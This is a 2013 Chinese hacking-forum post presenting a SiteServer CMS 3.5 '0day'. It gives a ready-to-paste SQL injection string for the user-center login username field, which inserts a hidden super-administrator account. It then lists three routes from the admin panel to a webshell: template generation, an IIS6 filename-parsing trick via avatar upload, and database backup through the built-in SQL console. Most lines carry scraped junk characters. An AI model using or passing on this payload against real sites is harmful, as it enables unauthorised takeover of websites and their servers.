找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2136|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版  U, v- X! S3 c. u. O: k0 }

9 V4 j: O. K8 ystieserver官网:www.siteserver.cn2 u# @0 P1 N. q/ Y
4 b1 b( R5 K% T$ w4 u
6 U8 K/ y3 ]- m: [- r
* S) A4 v9 V% U$ D
EXP:4 w" m! d6 P8 B/ v4 N- m
0 E0 S  J- y& h' Y0 R4 [
直接访问UserCenter/login.aspx6 k: |) G( I5 ]7 Y

* p: E2 \8 r6 r. X2 n ; h: B2 r3 r6 W8 Q7 }
3 j. s3 V( Z' z: \' I: k& p! T9 Q. b
用户名处输入:
6 r0 f! N# J2 T' n$ I% Q5 B- ?% m3 D, l) k/ X% s
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
" M- P( `* r3 x" V& `2 m& Q( S% I+ }8 Q' g' j# c

3 f0 y  f9 W& O: D8 G* J! x7 Y( {1 B1 [/ X- v1 Q) f( d! c; B
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。0 w; Q8 F8 \+ M7 _$ W2 C

% L3 r6 U& P4 c$ z' z: V
3 }6 @3 z& n) x% F4 m, a1 l2 |1 o2 ~- d4 P  m
之后再访问后台SiteServer/login.aspx用插入的用户登陆
6 _7 j6 V1 ~3 k4 d: t8 e; P: f  L& ?# k* c, Q; E% L5 F6 U! @% W. y

8 u8 x. B7 \) P  g% L5 }2 q
' U3 Z& [- n; Q9 B- W% Y后台拿webshell的三种方法:$ p# p" v9 _5 F- l# ^* C( p- n

0 f0 U, R9 q6 T0 o4 c' |; }8 n/ M一、
# g& u$ U; g5 Y% M1 {
) r% @0 U. L2 e5 j+ T: H# s6 |站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! Y/ N. l& y# O% k5 Z! P- s) Q  x1 a8 A) N( d8 y3 k* L- {
二、
# k8 }- l$ O* U2 h! g7 V8 S1 w$ c3 P/ E
成员权限-》添加用户-》用户名为:1.asp
; N# c! ?! b6 p% F5 w  U3 z6 ^. ~3 T) Q% H1 k2 s+ ~
http://127.0.0.1/usercenter/
4 Q+ q6 Q7 ~7 H# ?# h) Z0 S. d3 c3 I
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
- i' `9 Q/ X7 O# ?& }
/ \  @! Y; o' I# y$ ~* s# f(ps:后台添加用户时不会验证是否含有非法字符)/ v3 w! U+ E( g; y
1 s3 U: I/ ~- v  L8 X
三、( ~4 I1 J$ e7 a0 d* v' J; k, m# p

6 [* S1 a2 M  j7 |系统工具-》实用工具-》机器参数查看
2 s" N* q5 j% e+ d  P6 t. t/ Z2 m可以看到数据库类型、名称,WEB路径
( U/ s9 m+ j  n! ^& A1 C# _% N3 G, ~3 d
系统工具-》数据库工具-》SQL语句查询
+ T# d$ H1 W/ U) Q( }$ s这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# x5 c' U7 b0 K  ~" }& g4 R$ u2 M
$ X& l: L" I* G7 u) M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表